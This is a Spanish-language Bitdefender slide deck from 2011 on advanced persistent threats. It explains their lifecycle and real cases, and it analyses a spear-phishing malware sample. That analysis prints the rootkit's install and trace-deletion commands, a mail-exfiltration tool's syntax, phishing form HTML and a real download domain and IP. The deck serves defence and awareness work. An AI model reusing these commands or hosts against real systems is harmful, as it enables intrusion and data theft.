adavanced persistant threads

ADVANCED PERSISTENT THREATS

“Existen personas más inteligentes que tú, que tienen más recursos que tú, y que vienen a por tí. Buena suerte.” - Matt Olney (SourceFire)

Horatiu Bandoiu Pedro Sánchez

Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 3

Whoami

HORATIU BANDOIU

Trabajo:

Marketing – he aprendido hacer Powerpoints

Seguridad – Bitdefender – mas negocio que seguridad en aquellos tiempos

Seguridad – VAD especializado en seguridad de Rumania

Seguridad – Bitdefender

Experiencia relevante:

Estándares, buenas practicas, sistemas – ISO 27001 & similares

Algunas implantaciones de infraestructuras de seguridad y servicios profesionales

Interesado de: Psicología forense, steganografia, canales cubiertos, virtualización, sociología de la era Post PC etc.


Whoami He trabajado en importantes empresas como consultor especializado en

Computer Forensics, Honeynets, detección de intrusiones, redes trampa y pen-testing. He implantado normas ISO 27001, CMMI (nivel 5) y diversas metodologías de seguridad.

Colaboro sobre seguridad y análisis forense informático con diversas organizaciones comerciales y con las fuerzas de seguridad del estado, especialmente con el Grupo de Delitos Telemáticos de la Guadia Civil y la Brigada de Investigación Tecnológica de la policia nacional. También he participado en las jornadas JWID/CWID organizadas por el ministerio de defensa, en donde obtuve la certificación nato secret.

Actualmente soy miembro de la Spanish Honeynet Project y trabajo de consultor asociado para Bitdefender y Security Forensics en Google. Soy el autor del blog conexión Inversa

PEDRO SANCHEZ


¿Que es un APT? (Advanced Persistent Threat)

• Amenaza: te amenaza, pero hay un grado de intervención humana, coordinados en el ataque. Los criminales tienen un objetivo específico y están motivados, organizados y bien financiados.

• Persistentes: los criminales dan prioridad a una tarea específica, en vez de

obtener un beneficio económico inmediato. El ataque se lleva a cabo a través de un seguimiento e interacción continuos con el fin de alcanzar los objetivos definidos y que el mismo se mantenga en el tiempo.

• Avanzada: los criminales utilizan tecnologías y técnicas de intrusión informática avanzadas. Aunque la componente mas usual del ataque es el malware. Los delincuentes pueden acceder y desarrollar instrumentos más avanzados cuando sea necesario. Además, se combinan las metodologías de múltiples ataques y herramientas a fin de alcanzar el objetivo.


¿Como son? Realidades:

• Los ataques APT pueden romper la seguridad de una empresa aunque esta haya sido diseñada en seguridad desde el diseño por medio de muchos vectores:

Infección a través de malware en Internet (Drive-by-Download).

Ingreso de malware físicamente.

Explotación desde el exterior.


¿Como son?

• El abuso de las empresas en el pobre control de cesión de "conexiones de confianza“ como las VPN's, es un ingrediente clave para muchos APT.

• Los criminales a menudo suplantan las credenciales de los empleados secuestrados por malware.

• Por lo tanto, cualquier organización o sitio remoto puede ser víctima de un APT y ser utilizado como un punto de recolección de información. Un requisito fundamental para APT es permanecer invisible durante todo el

tiempo que sea posible.


¿Quienes son? (APT vs Hackers)

• Denominados “atacantes”, no hackers. Son profesionales organizados, muchas veces financiados por estructuras estatales o organizaciones / empresas con mucho poder

• Su motivación, técnicas y tenacidad son diferentes.

• Aunque su motivación parezca familiar (robar datos), los ataques APT son diferentes...el TARGET es diferente

• También establecen un medio para volver a la víctima, para robar datos adicionales y para permanecer ocultos en su red sin ser detectados por la víctima


Objetivos del APT

Políticos Económicos Técnicos Militares

Los APTs con capaces de comprometer la seguridad de cualquier objetivo que se fijen. Las medidas de seguridad convencionales son en 95% de casos inútiles frente a estos ataques.


Ciclo de despliegue del APT

1.- Reconocimiento

2.- Intrusión

3.- Implantación, despliegue de herramientas y robo de identidades.

4.- Robo de datos

5.- Mantener la persistencia

6.- (Desaparecer)


1.- Reconocimiento

Durante la fase de reconocimiento los atacantes identifican a las personas de interés en la organización.

OBJETIVO: Presidentes, Directores, Directivos, Gerentes, Administradores de Sistema/ Seguridad (!!!), Ingenieros, hasta secretarias de dirección.

Muchos de estos datos pueden obtenerse directamente de las web públicas. En

otros casos puede obtenerse de los “metadatos” incluidos en documentos Office y PDF disponibles online o en los buscadores mas utilizados como Google y Bing.

¿Alguien conoce alguna FOCA?


2.- Intrusión

El mas utilizado es la técnica que combina ingeniería social conjuntamente con el correo electrónico, llamado “spear phishing”

En este tipo de estafa el ciberdelincuente envía un correo electrónico a los empleados de una determinada empresa, suplantando la identidad de un directivo u otro miembro de la misma.

Los adjuntos suelen contener:

Archivo con malware

Archivo Microsoft Office con ejecución selectiva de Macros

Exploit de Adobe Reader, etc.

Cuando no son adjuntos, son enlaces a sitios que plantean el malware (como en el phishing tradicional). O es el Facebook, LinkedIn, Tuenti …


3.- Implantación,despliegue y robo

Durante la fase de establecer un acceso remoto por medio de 'conexión inversa‘, los atacantes intentan obtener las credenciales de administrador del dominio, para elevar privilegios y moverse por distintas máquinas propiedad de la empresa, instalando a su vez otras herramientas de 'hacking' o de malware controlado.

El malware utilizado no suele ser detectado por los AV ni sistemas de detección de

intrusos (IDS), y se instala normalmente con privilegios de nivel de sistema.

La acción mas común es intentar conseguir credenciales de administrador local de la máquina, dado que las políticas de seguridad en muchas empresas suelen ser relajadas.

Se intentan obtener credenciales de usuario de toda la empresa

Después se realizan sesiones NETBIOS con dichas credenciales para obtener acceso a las carpetas y ficheros de la red.


3.- Implantación,despliegue y robo

Se crean usuarios ficticios en los sistemas más fáciles de compromiso como servidores de bases de datos, de correo y control de aplicaciones.

Se preparan los atacantes e instalan paneles de control para utilidades con objeto de realizar diferentes tareas de administración:

Instalar más puertas traseras, extraer emails de servidores, listar procesos en ejecución, extraer ficheros y empaquetarles, establecer canales cubiertos.

En el peor de los escenarios se crean rutas alternativas para salir hacia internet y se llega a controlar los routers y otros dispositivos de comunicaciones y seguridad como los cortafuegos.


4.- Robo de datos

El atacante extrae datos como emails, archivos adjuntos y otros ficheros desde estaciones de trabajo y servidores de ficheros.

La información se comprimen y se protege (p.ej. Archivos RAR segmentados protegidos con contraseña) en servidores intermedios antes de enviarla a un servidor que pertenece a la infraestructura de la red atacante (servidores C2, C&C

o Command and Control). También se han visto casos en que se depositan en grandes contenedores de datos como MEGAUPLOAD y RAPIDSHARE.

Los archivos comprimidos se eliminan de los servidores intermedios en la ultima fase para no dejar rastro.


5.- Persistencia

En la fase de mantener persistencia el atacante responde a los intentos de respuesta al incidente de la víctima:

- Estableciendo nuevos puntos de acceso a la red

- Mejorando la sofisticación y actualizar el malware

- Modificando código fuente de aplicaciones legitimas o repositorios donde se

encuentran.

- Borrando log's

- Inhabilitando antivirus o haciendo que estos se comporten de forma anómala


Casos reales de APT


Caso 1: Ataques sobre la Industria Petrolífera Americana

US oil industry hit by cyberattacks: Was China involved? (Christian Science Monitor)

- Iniciado en 2008 - Spear Phishing a empleados de nivel C - 2 años sin ser observado/respondido - Tenían medidas de seguridad de alto nivel SO WHAT?


CASO 2: CASO AURORA

• Un ataque tipo phishing en Enero 2010 – oops, it happens again !!!

• La investigación ha revelado no menos de 34 empresas afectadas, de Google e Yahoo hasta a empresas de seguridad como Symantec y Juniper, pero también

fabricantes de tecnologias de defensa como Northrop Grumman.

• Chinese Operation ??? El gobierno chino?


Aurora C&C Communication

- El cargo estaba comunicando con el C&C en el puerto 443 (https).

- El puerto de salida se elige aleatoriamente - Se estaba usando trafico encriptado - La estructura del paquete:

- La parte de payload esta encriptada con una llave seleccionada

con GetTickCount – cada nodo infectado tiene su propia llave - La llave se transmite en el packet header para ser recuperada facilmente


CASO 3: STUXNET – EL CIBERARMA

La Reina Esther: ראסת

Todos hablábamos sobre las vulnerabilidades de Industrial

Control Systems

Los vectores de ataque han cambiado:

1. Un USB Stick que contenía un malware increíblemente complejo

2. El payload buscaba su objetivo: (Siemens SIMATIC WinCC/Step 7 Controller software

3. El malware afectaba la interfaz de control y colección de datos de maquinas a centrifugar Uranio y SE ESCONDIA

4. Se puede actualizar hasta 24 de Junio 2012 (los francmasones??)


CASO 2: DRONES WAR

• Drone = un pequeño dispositivo usado en operaciones militares, en nuestro caso un avión (UAV) que es controlado a distancia por un piloto que, lógicamente,

queda resguardado en su base y fuera de todo peligro.

• Creech Aerial Base – keyloggers y comunicaciones

“curiosas” – Le gusta

Mafia Wars?

• Malintencionado o accidente?


CASO 3: DuQu – Stuxnet 2

Fuente: Symantec


Anatomía de un APT


ANATOMIA DE UN CASO DE APT Como funciona:


ANATOMIA DE UN CASO DE APT

Paso 1. Reconocimiento

Entidad de auditoria financiera

Tiene clientes importantes

Están usando portátiles para analizar y transferir datos – propios y de clientes

Muy móviles, poca seguridad para los trabajadores en remoto



Paso 2. Spear Phishing

http://3.bp.blogspot.com/-XeR0QLgm7GY/Tl4y_Fq3QFI/AAAAAAAACd0/X9neuDGweRo/s1600/Captura+de+pantalla+2011-08-31+a+la(s)+15.09.09.png



Paso 2. Spear Phishing form name=3D"1318a6060f9f02b2_mygmail_loginform"

action=3D"http://www.lsbu.ac.uk/php4-

cgiwrap/hscweb/cm/login.php“

method=3D"post" target=3D"_blank"

onsubmit=3D"alert("This form has been disabled.");

return false">{div name=3D"gaia_loginbox">

--------------------------------

input name=3D"AGALX" value=3D"NIE34iN5DAAYY"

type=3D"hidden">=20 input name=3D"myEmail" size=3D"18"

value=3D"[email protected]"

type=3D"text">{/td>

http://4.bp.blogspot.com/-3dpPSAlN00Y/TmD0AvtlUXI/AAAAAAAACd8/yFSYAseXdNY/s1600/Captura+de+pantalla+2011-09-02+a+la(s)+17.18.31.png



Paso 3. El malware - Dirección de correo fake en Gmail

- Llegamos al “bicho”

http://1.bp.blogspot.com/-5xicTqa0lbw/TmS4jcCe-VI/AAAAAAAACeM/1qtn0gVw3Qg/s1600/Captura+de+pantalla+2011-09-05+a+la(s)+13.53.17.png



Paso 3. El malware - Ejecutamos el bicho en maquina virtual y le damos

tiempo para manifestarse

- El fichero docx da un error clásico de Runtime

http://3.bp.blogspot.com/-uYoaTSeZ8Kw/TmaBP9YaluI/AAAAAAAACe8/19bbFMM_Tds/s1600/error11.png



Paso 3. El malware - Mientras tanto, sorpresa:

- se ha lanzado un proceso “file.exe” y

- se ha creado en los temporales un html en la ruta

C:\Documents and Settings\KLY\Local Settings\Temp\mhzksbnz.html)



Paso 3. El malware El malware

registra los inputs

del teclado

Keylogger

http://3.bp.blogspot.com/-PZTvGn3J4C4/TmYtBuqk2ZI/AAAAAAAACec/zxCPxJ18PcI/s1600/Captura+de+pantalla+2011-09-06+a+la(s)+16.12.30.png



Paso 3. El malware El proceso 'file.exe' crea también un fichero 'UpdaterInfo.dat‘

+ diversas librerías .dll y otros diversos ficheros 'html'.

(se esta preparando para el siguiente paso)

http://4.bp.blogspot.com/-rk5g7xPwgdU/TmYuWZfew7I/AAAAAAAACek/lJxJTexAqMQ/s1600/Captura+de+pantalla+2011-09-06+a+la(s)+16.18.00.png



Paso 4. Comunicamos ? El proceso lanza una conexión a Internet y por HTTP se conecta al siguiente dominio 'tomitomi.cn - 195.248.234.157' (registrado a nombre de Zhejiang 5 Red Interior – una empresa de diseño grafico) y procede a la descarga de un fichero comprimido de nombre 'gamer.zip‘

http://4.bp.blogspot.com/-idEqOCpTwBM/TmYiI-8weGI/AAAAAAAACeU/ni44WvqOP1c/s1600/Captura+de+pantalla+2011-09-06+a+la(s)+15.33.28.png



Paso 5. Silencio! Estamos trabajando! • El fichero se almacena en la carpeta 'temp' y contiene los

siguientes ficheros:

– iam.exe

– iam.dll

– m.exe

– r.exe

– y.exe

– sas.bat



Paso 5. Silencio! Estamos trabajando! • El fichero m.exe es una variación de 'getmail' y sirve para

recuperar mensajes de correo electrónico de servidores Exchange

Ejemplo:

%s -s:sn-server1.mailserver.com -u:exuser4 -t:2011-7-25-14 -o:c:\winnt\temp

%s -s:ExchangeServer -u:UserName -t:YYYY-MM-DD-HH -o:SavePath

•

http://pages.interlog.com/~tcharron/getmail.html



Paso 5. Silencio! Estamos trabajando! • El fichero r.exe es el rar.exe de Winrar y sirve probablemente

para la compresion de los datos robados

• El rootkit y.exe crea el fichero 'C:\WINDOWS\system32\prxy.dll' y un archivo por lotes de nombre 'sas.bat'

• A continuación se crea un proceso basando en 'cmd.exe' con el siguiente comando 'cmd /c rundll32 prxy.dll,RundllInstall' y con los posteriores comandos:


cmd /c attrib +h +s prxy.dll cmd /c net start bits cmd /c net stop bits cmd /c rundll32 prxy.dll,RundllInstall prxy.dll cmd /c sas.bat del %s del %s /as ping 127.0.0.1 -n 3 del sas.bat


PRXY.DLL Creado por 'Y.EXE' reemplaza el servicio legitimo BITs de Windows ubicado en la siguiente rama del registro: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS\Parameters Facilita la descarga de software sin que la mayoría de los antivirus o cortafuegos hagan algo al respecto, dado que al tratarse de un servicio legitimo se permiten la entrada y salida de trafico hacia Internet.


SAS.BAT Como su nombre indica es un fichero de proceso por lotes y quizás este es el mas sorprendente de los ficheros analizados por el contenido:

http://2.bp.blogspot.com/-uLJMoIOvDdM/Tmh4uJuaHkI/AAAAAAAACfU/b7us5YMK0vo/s1600/Captura+de+pantalla+2011-09-08+a+la(s)+10.10.57.png


Si descomprimimos el archivo ~WRD0100.tmp nos

encontramos con lo siguiente:

http://1.bp.blogspot.com/-UbCqlJMOBBA/TmaIjExXEUI/AAAAAAAACfA/NyNzP7IwqWk/s1600/maillog.JPG


CONCLUSION ?

• Aun estamos investigando pero parece que alguien se prepara para hacer una grande implantación en la consultora y sus clientes. O lo ha hecho ya?


Conclusiones APT APT no es un problema exclusivo de otros ni de estado, militar o de ciertas

industrias. Todos somos susceptibles de ser atacados

No existe un objetivo pequeño, ni poco defendido. Interesa ya no lo económico, pero lo interesante y privado

El enemigo es capaz de evadir antivirus, IDS y los equipos de respuesta a

incidentes no están debidamente equipados.

De todo el malware analizado en casos conocido de APT, sólo el 24% fue detectado por software antimalware.

Evitan la detección utilizando puertos TCP/IP comunes, inyección en procesos comunes, y persistencia mediante servicios de Windows. También se instala en modo privilegiado (si lo puede conseguir).

Sólo inician conexiones “salientes”, casi nunca se inician en modo “escucha” de conexiones entrantes.

En sistemas virtualizados o en el cloud muchas veces la seguridad se relega a mecanismos tradicionales y esto no es suficiente


Conclusiones APT ¿Como arreglo esto?

Debes ser capaz de ver y buscar signos de intrusiones más allá del antivirus y del IDS:

Empieza a utilizar la palabra, concientizar los usuarios e implantar mecanismos de 'Monitorizar', por lo tanto:

Información a nivel de RED

Información a nivel de HOST

Procesos

SIEM?

Debes mirar examinar el contenido del tráfico de red, ficheros, correos e

incluso la memoria RAM de los sistemas, ¿Cuanto hace que no revisas los procesos de tu granja virtualizada?

Empieza a distinguir entre OK y NOK o falso positivo o falso negativo. No delegues esta función, hazlo tú.


¿Como arreglo esto?

D e t e c c i ó n I n c r e m e n t a d a

0010 B8 00 00 00 00 00 00 00 40 00 00 0020 00 00 00 00 00 00 00 00 00 00 00 0030 00 00 00 00 00 00 00 D0 00 00 4C 0040 OE IF EA OE 09 CD 21 B8 01 4C CD




Conclusiones APT ¿Como arreglo esto?

No peleamos contra máquinas ni código, lo hacemos contra inteligencia humana y de buena calidad

Necesitamos herramientas que se integren con la forma de pensar, los métodos y las habilidades de los responsables de defender a las

organizaciones, es decir una nueva figura como los analistas de seguridad.

Necesitamos saber lo que queremos proteger y protegerlo adecuadamente.

Los AV tradicionales no sirven. Que tal de nuevas tecnologías?

THINK DIFFERENTLY !!!

No puedes protegerlo todo, protege lo que tiene mas valor


Conclusiones APT Seguridad en la era PostPC

Usamos cada día mas y más dispositivos nuevos que no tienen seguridad por diseño

Hacemos mas y mas las cosas “en la nube”

Nos movemos mucho, junto con nuestros “boxes”

Estamos virtualizando casi todo

Pero las cosas básicas de seguridad no han cambiado.

ADAPT! STAY AWARE!

Muchas GRACIAS!

adavanced persistant threads

Technology